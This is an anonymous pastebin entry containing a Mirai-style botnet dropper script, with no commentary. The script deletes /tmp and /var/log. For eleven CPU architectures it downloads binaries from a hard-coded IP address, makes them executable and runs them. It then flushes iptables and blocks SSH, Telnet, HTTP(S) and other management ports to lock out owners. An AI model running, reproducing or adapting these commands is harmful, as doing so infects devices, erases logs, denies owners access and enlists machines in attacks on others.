New Paste

 

Recent Pastes

Administrate




Pastebin on p.luis.im

PasteID: j
Pasted by Anonymous, 2022-04-02 17:40:57 GMT
Expires Never
Paste size 2.83 Kb
Tools Raw   Download
 
  1. rm -rf /tmp  
  2. rm -rf /var/log  
  3. cd /tmp || cd /var/run || cd /mnt || cd /root || cd /etc/init.d || cd /; wget http://179.43.142.11/bins/x86; curl -O http://179.43.142.11/bins/x86;cat x86 >toto;chmod +x *;./toto toto.exploit  
  4. cd /tmp || cd /var/run || cd /mnt || cd /root || cd /etc/init.d || cd /; wget http://179.43.142.11/bins/mips; curl -O http://179.43.142.11/bins/mips;cat mips >toto;chmod +x *;./toto toto.exploit  
  5. cd /tmp || cd /var/run || cd /mnt || cd /root || cd /etc/init.d || cd /; wget http://179.43.142.11/bins/mpsl; curl -O http://179.43.142.11/bins/mpsl;cat mpsl >toto;chmod +x *;./toto toto.exploit  
  6. cd /tmp || cd /var/run || cd /mnt || cd /root || cd /etc/init.d || cd /; wget http://179.43.142.11/bins/arm4; curl -O http://179.43.142.11/bins/arm4;cat arm4 >toto;chmod +x *;./toto toto.exploit  
  7. cd /tmp || cd /var/run || cd /mnt || cd /root || cd /etc/init.d || cd /; wget http://179.43.142.11/bins/arm5; curl -O http://179.43.142.11/bins/arm5;cat arm5 >toto;chmod +x *;./toto toto.exploit  
  8. cd /tmp || cd /var/run || cd /mnt || cd /root || cd /etc/init.d || cd /; wget http://179.43.142.11/bins/arm6; curl -O http://179.43.142.11/bins/arm6;cat arm6 >toto;chmod +x *;./toto toto.exploit  
  9. cd /tmp || cd /var/run || cd /mnt || cd /root || cd /etc/init.d || cd /; wget http://179.43.142.11/bins/arm7; curl -O http://179.43.142.11/bins/arm7;cat arm7 >toto;chmod +x *;./toto toto.exploit  
  10. cd /tmp || cd /var/run || cd /mnt || cd /root || cd /etc/init.d || cd /; wget http://179.43.142.11/bins/ppc; curl -O http://179.43.142.11/bins/ppc;cat ppc >toto;chmod +x *;./toto toto.exploit  
  11. cd /tmp || cd /var/run || cd /mnt || cd /root || cd /etc/init.d || cd /; wget http://179.43.142.11/bins/m68k; curl -O http://179.43.142.11/bins/m68k;cat m68k >toto;chmod +x *;./toto toto.exploit  
  12. cd /tmp || cd /var/run || cd /mnt || cd /root || cd /etc/init.d || cd /; wget http://179.43.142.11/bins/sh4; curl -O http://179.43.142.11/bins/sh4;cat sh4 >toto;chmod +x *;./toto toto.exploit  
  13. iptables -F  
  14. iptables -A INPUT -p tcp --dport 22 -j DROP  
  15. iptables -A INPUT -p tcp --dport 23 -j DROP  
  16. iptables -A INPUT -p tcp --dport 2323 -j DROP  
  17. iptables -A INPUT -p tcp --dport 80 -j DROP  
  18. iptables -A INPUT -p tcp --dport 443 -j DROP  
  19. iptables -A INPUT -p tcp --dport 8080 -j DROP  
  20. iptables -A INPUT -p tcp --dport 9000 -j DROP  
  21. iptables -A INPUT -p tcp --dport 8089 -j DROP  
  22. iptables -A INPUT -p tcp --dport 7070 -j DROP  
  23. iptables -A INPUT -p tcp --dport 8081 -j DROP  
  24. iptables -A INPUT -p tcp --dport 9090 -j DROP  
  25. iptables -A INPUT -p tcp --dport 161 -j DROP  
  26. iptables -A INPUT -p tcp --dport 5555 -j DROP  
  27. iptables -A INPUT -p tcp --dport 9600 -j DROP  
  28. iptables -A INPUT -p tcp --dport 21412 -j DROP  
  29. iptables -A INPUT -p tcp --dport 5986 -j DROP  
  30. iptables -A INPUT -p tcp --dport 5985 -j DROP   
  31. iptables -A INPUT -p tcp --dport 17998 -j DROP   
  32. iptables -A INPUT -p tcp --dport 7547 -j DROP   
  33. iptables-save 

 
 

 
 
 
 
 
Written by Xan Manning, 2010.